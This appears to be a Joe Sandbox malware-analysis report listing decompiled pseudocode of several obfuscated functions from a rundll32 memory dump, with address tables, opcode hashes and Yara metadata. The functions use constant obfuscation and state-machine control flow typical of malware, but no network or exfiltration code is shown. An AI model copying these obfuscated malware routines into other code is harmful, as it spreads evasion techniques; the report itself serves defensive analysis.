                                                                                                                                  0x002d44c0
                                                                                                                                  0x002d44c3
                                                                                                                                  0x002d44c7
                                                                                                                                  0x002d44cc
                                                                                                                                  0x002d44d9
                                                                                                                                  0x002d44e6
                                                                                                                                  0x002d44ee
                                                                                                                                  0x002d44f6
                                                                                                                                  0x002d44fe
                                                                                                                                  0x002d450b
                                                                                                                                  0x002d450f
                                                                                                                                  0x002d4517
                                                                                                                                  0x002d451f
                                                                                                                                  0x002d4527
                                                                                                                                  0x002d452f
                                                                                                                                  0x002d4534
                                                                                                                                  0x002d453c
                                                                                                                                  0x002d4544
                                                                                                                                  0x002d454c
                                                                                                                                  0x002d4554
                                                                                                                                  0x002d455c
                                                                                                                                  0x002d455c
                                                                                                                                  0x002d4566
                                                                                                                                  0x002d45bd
                                                                                                                                  0x002d45e3
                                                                                                                                  0x002d45e8
                                                                                                                                  0x002d45ed
                                                                                                                                  0x002d45ef
                                                                                                                                  0x00000000
                                                                                                                                  0x002d45ef
                                                                                                                                  0x002d4568
                                                                                                                                  0x002d456e
                                                                                                                                  0x002d45b9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4570
                                                                                                                                  0x002d4576
                                                                                                                                  0x00000000
                                                                                                                                  0x002d457c
                                                                                                                                  0x002d457c
                                                                                                                                  0x002d45a1
                                                                                                                                  0x002d45ad
                                                                                                                                  0x002d45ad
                                                                                                                                  0x002d4576
                                                                                                                                  0x002d456e
                                                                                                                                  0x002d45b0
                                                                                                                                  0x002d45b8
                                                                                                                                  0x002d45b8
                                                                                                                                  0x002d4606
                                                                                                                                  0x002d4607
                                                                                                                                  0x002d460d
                                                                                                                                  0x002d4613
                                                                                                                                  0x002d461f
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4615
                                                                                                                                  0x002d4615
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4615
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4624
                                                                                                                                  0x002d4624
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                  • Instruction ID: 95b878d80e84a08dc73784530c013c9eb565421ac534a2f83bd840c7faa05270
                                                                                                                                  • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                                  • Instruction Fuzzy Hash: 937154B21193419FD358DF21D98982BBBF1EBD5718F40890DF29656260D3B2C919CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002E894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E002D3DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E002D2A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E002ED97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                                  0x002e8952
                                                                                                                                  0x002e8956
                                                                                                                                  0x002e8958
                                                                                                                                  0x002e895a
                                                                                                                                  0x002e895e
                                                                                                                                  0x002e8962
                                                                                                                                  0x002e8966
                                                                                                                                  0x002e8967
                                                                                                                                  0x002e8968
                                                                                                                                  0x002e896d
                                                                                                                                  0x002e8975
                                                                                                                                  0x002e897e
                                                                                                                                  0x002e8980
                                                                                                                                  0x002e8987
                                                                                                                                  0x002e898c
                                                                                                                                  0x002e8992
                                                                                                                                  0x002e8997
                                                                                                                                  0x002e899f
                                                                                                                                  0x002e89a7
                                                                                                                                  0x002e89af
                                                                                                                                  0x002e89b7
                                                                                                                                  0x002e89bf
                                                                                                                                  0x002e89c7
                                                                                                                                  0x002e89cc
                                                                                                                                  0x002e89d8
                                                                                                                                  0x002e89dd
                                                                                                                                  0x002e89e3
                                                                                                                                  0x002e89eb
                                                                                                                                  0x002e89f3
                                                                                                                                  0x002e89fb
                                                                                                                                  0x002e8a03
                                                                                                                                  0x002e8a10
                                                                                                                                  0x002e8a13
                                                                                                                                  0x002e8a17
                                                                                                                                  0x002e8a1f
                                                                                                                                  0x002e8a27
                                                                                                                                  0x002e8a34
                                                                                                                                  0x002e8a38
                                                                                                                                  0x002e8a3d
                                                                                                                                  0x002e8a45
                                                                                                                                  0x002e8a55
                                                                                                                                  0x002e8a59
                                                                                                                                  0x002e8a61
                                                                                                                                  0x002e8a69
                                                                                                                                  0x002e8a75
                                                                                                                                  0x002e8a7d
                                                                                                                                  0x002e8a81
                                                                                                                                  0x002e8a89
                                                                                                                                  0x002e8a91
                                                                                                                                  0x002e8a99
                                                                                                                                  0x002e8aa1
                                                                                                                                  0x002e8aa6
                                                                                                                                  0x002e8aae
                                                                                                                                  0x002e8aae
                                                                                                                                  0x002e8abc
                                                                                                                                  0x002e8b33
                                                                                                                                  0x002e8b38
                                                                                                                                  0x002e8b3b
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8abe
                                                                                                                                  0x002e8ac4
                                                                                                                                  0x002e8b0e
                                                                                                                                  0x002e8b13
                                                                                                                                  0x002e8b16
                                                                                                                                  0x002e8b18
                                                                                                                                  0x002e8b1a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8b1a
                                                                                                                                  0x002e8ac6
                                                                                                                                  0x002e8ac6
                                                                                                                                  0x002e8acc
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8ace
                                                                                                                                  0x002e8ae2
                                                                                                                                  0x002e8aef
                                                                                                                                  0x002e8aef
                                                                                                                                  0x002e8acc
                                                                                                                                  0x002e8ac4
                                                                                                                                  0x002e8af3
                                                                                                                                  0x002e8afb
                                                                                                                                  0x002e8afb
                                                                                                                                  0x002e8b45
                                                                                                                                  0x002e8b47
                                                                                                                                  0x002e8b47
                                                                                                                                  0x002e8b47
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                  • Instruction ID: 93bbe1fa51973814206e9a3b9593943ad9e858ef3dcfb7cff86a87cec11d1144
                                                                                                                                  • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                                  • Instruction Fuzzy Hash: AE519A71148341AFC754CF22C98581BBBE5FBD8708F50992EF59996220D772CA29CF87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EAC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002EAC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E002D474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E002EC2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                                  0x002eac3a
                                                                                                                                  0x002eac3a
                                                                                                                                  0x002eac3d
                                                                                                                                  0x002eac47
                                                                                                                                  0x002eac4f
                                                                                                                                  0x002eac5e
                                                                                                                                  0x002eac68
                                                                                                                                  0x002eac6c
                                                                                                                                  0x002eac6e
                                                                                                                                  0x002eac76
                                                                                                                                  0x002eac78
                                                                                                                                  0x002eac80
                                                                                                                                  0x002eac88
                                                                                                                                  0x002eac90
                                                                                                                                  0x002eac98
                                                                                                                                  0x002eaca0
                                                                                                                                  0x002eacab
                                                                                                                                  0x002eacb8
                                                                                                                                  0x002eacbc
                                                                                                                                  0x002eacc4
                                                                                                                                  0x002eaccc
                                                                                                                                  0x002eacd4
                                                                                                                                  0x002eacdc
                                                                                                                                  0x002eace4
                                                                                                                                  0x002eacec
                                                                                                                                  0x002eacf4
                                                                                                                                  0x002eacfe
                                                                                                                                  0x002ead02
                                                                                                                                  0x002ead0a
                                                                                                                                  0x002ead17
                                                                                                                                  0x002ead1b
                                                                                                                                  0x002ead20
                                                                                                                                  0x002ead28
                                                                                                                                  0x002ead35
                                                                                                                                  0x002ead39
                                                                                                                                  0x002ead3e
                                                                                                                                  0x002ead43
                                                                                                                                  0x002ead4b
                                                                                                                                  0x002ead4b
                                                                                                                                  0x002ead51
                                                                                                                                  0x002ead8a
                                                                                                                                  0x002ead8b
                                                                                                                                  0x002ead8c
                                                                                                                                  0x002ead91
                                                                                                                                  0x002ead94
                                                                                                                                  0x002ead96
                                                                                                                                  0x00000000
                                                                                                                                  0x002ead53
                                                                                                                                  0x002ead55
                                                                                                                                  0x00000000
                                                                                                                                  0x002ead57
                                                                                                                                  0x002ead72
                                                                                                                                  0x002ead72
                                                                                                                                  0x002ead55
                                                                                                                                  0x002ead74
                                                                                                                                  0x002ead7d
                                                                                                                                  0x002ead7d
                                                                                                                                  0x002ead9a
                                                                                                                                  0x002ead9c
                                                                                                                                  0x002ead9c
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                  • Instruction ID: 467f6f616c9e5317bc4e96019c0c0f760495dfdca1cdcda760708c93b15fdda5
                                                                                                                                  • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                                  • Instruction Fuzzy Hash: 423176724083428BC318CF25C88540BFBE0FBD8788F508A1DF599A7220D3B5DA59CB97
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D8969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002D8969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E002E20B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E002ED25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E002E0AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E002D80E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                                  0x002d8971
                                                                                                                                  0x002d8974
                                                                                                                                  0x002d8976
                                                                                                                                  0x002d8979
                                                                                                                                  0x002d897b
                                                                                                                                  0x002d8980
                                                                                                                                  0x002d8986
                                                                                                                                  0x002d898a
                                                                                                                                  0x002d8991
                                                                                                                                  0x002d8998
                                                                                                                                  0x002d89a5
                                                                                                                                  0x002d89a6
                                                                                                                                  0x002d89a9
                                                                                                                                  0x002d89b0
                                                                                                                                  0x002d89b7
                                                                                                                                  0x002d89be
                                                                                                                                  0x002d89c5
                                                                                                                                  0x002d89cc
                                                                                                                                  0x002d89d7
                                                                                                                                  0x002d89da
                                                                                                                                  0x002d89e1
                                                                                                                                  0x002d89ed
                                                                                                                                  0x002d89f0
                                                                                                                                  0x002d89f7
                                                                                                                                  0x002d8a02
                                                                                                                                  0x002d8a05
                                                                                                                                  0x002d8a0c
                                                                                                                                  0x002d8a0f
                                                                                                                                  0x002d8a16
                                                                                                                                  0x002d8a21
                                                                                                                                  0x002d8a28
                                                                                                                                  0x002d8a2b
                                                                                                                                  0x002d8a32
                                                                                                                                  0x002d8a39
                                                                                                                                  0x002d8a40
                                                                                                                                  0x002d8a44
                                                                                                                                  0x002d8a4b
                                                                                                                                  0x002d8a58
                                                                                                                                  0x002d8a5d
                                                                                                                                  0x002d8a64
                                                                                                                                  0x002d8a6b
                                                                                                                                  0x002d8a72
                                                                                                                                  0x002d8a79
                                                                                                                                  0x002d8a7d
                                                                                                                                  0x002d8a84
                                                                                                                                  0x002d8a97
                                                                                                                                  0x002d8a9c
                                                                                                                                  0x002d8aa2
                                                                                                                                  0x002d8aa7
                                                                                                                                  0x002d8aa8
                                                                                                                                  0x002d8aa9
                                                                                                                                  0x002d8aab
                                                                                                                                  0x002d8ab5
                                                                                                                                  0x002d8abe

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                  • Instruction ID: 7bd997e514695ed2f1f7847f62b883445238ab75ae85df1f631ecea94c625a2e
                                                                                                                                  • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                                  • Instruction Fuzzy Hash: 4141FD71C1021AEBCF18CFE5C98A9EEBFB0FB44314F108189D525AA260D3B84B85CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EDBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EDBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002E20B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                                  0x002edbf1
                                                                                                                                  0x002edbf4
                                                                                                                                  0x002edbf6
                                                                                                                                  0x002edbf9
                                                                                                                                  0x002edbfc
                                                                                                                                  0x002edbfe
                                                                                                                                  0x002edc03
                                                                                                                                  0x002edc0a
                                                                                                                                  0x002edc10
                                                                                                                                  0x002edc17
                                                                                                                                  0x002edc1e
                                                                                                                                  0x002edc25
                                                                                                                                  0x002edc2c
                                                                                                                                  0x002edc33
                                                                                                                                  0x002edc3a
                                                                                                                                  0x002edc46
                                                                                                                                  0x002edc49
                                                                                                                                  0x002edc4c
                                                                                                                                  0x002edc50
                                                                                                                                  0x002edc57
                                                                                                                                  0x002edc5e
                                                                                                                                  0x002edc65
                                                                                                                                  0x002edc69
                                                                                                                                  0x002edc70
                                                                                                                                  0x002edc74
                                                                                                                                  0x002edc7e
                                                                                                                                  0x002edc82
                                                                                                                                  0x002edc87
                                                                                                                                  0x002edc95
                                                                                                                                  0x002edc98
                                                                                                                                  0x002edc9c
                                                                                                                                  0x002edca3
                                                                                                                                  0x002edcb0
                                                                                                                                  0x002edcb7
                                                                                                                                  0x002edcbb
                                                                                                                                  0x002edcc2
                                                                                                                                  0x002edcc6
                                                                                                                                  0x002edcd8
                                                                                                                                  0x002edcdb
                                                                                                                                  0x002edce0
                                                                                                                                  0x002edce3
                                                                                                                                  0x002edce6
                                                                                                                                  0x002edce7
                                                                                                                                  0x002edce8
                                                                                                                                  0x002edcee
                                                                                                                                  0x002edcf6

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                  • Instruction ID: f50ffc8d7e571c998bfca487523b63fd10baa4c82e4847d23aa800ff1a0f06d8
                                                                                                                                  • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                  • Instruction Fuzzy Hash: 52311175D12348EBDF06DFA8CA4A2DEBBB0EF44314F608099D501A7265D3B14B98EF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D9011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D9011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E002E5BFD(_v32, _v28, _v12, E002EDCF7(_v8, __ecx, _v36));
				_t80 =  *0x2f3df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E002DA8B0(_v16, _t74, _v36);
			}

















                                                                                                                                  0x002d9017
                                                                                                                                  0x002d901b
                                                                                                                                  0x002d9022
                                                                                                                                  0x002d902f
                                                                                                                                  0x002d9035
                                                                                                                                  0x002d9038
                                                                                                                                  0x002d903f
                                                                                                                                  0x002d9043
                                                                                                                                  0x002d904a
                                                                                                                                  0x002d9051
                                                                                                                                  0x002d9054
                                                                                                                                  0x002d905b
                                                                                                                                  0x002d9062
                                                                                                                                  0x002d9066
                                                                                                                                  0x002d906d
                                                                                                                                  0x002d9074
                                                                                                                                  0x002d9078
                                                                                                                                  0x002d907f
                                                                                                                                  0x002d9086
                                                                                                                                  0x002d908a
                                                                                                                                  0x002d9091
                                                                                                                                  0x002d9098
                                                                                                                                  0x002d909f
                                                                                                                                  0x002d90a6
                                                                                                                                  0x002d90aa
                                                                                                                                  0x002d90b1
                                                                                                                                  0x002d90bb
                                                                                                                                  0x002d90c0
                                                                                                                                  0x002d90c3
                                                                                                                                  0x002d90ca
                                                                                                                                  0x002d90d1
                                                                                                                                  0x002d90d8
                                                                                                                                  0x002d90df
                                                                                                                                  0x002d90e6
                                                                                                                                  0x002d90ed
                                                                                                                                  0x002d90f0
                                                                                                                                  0x002d9107
                                                                                                                                  0x002d910c
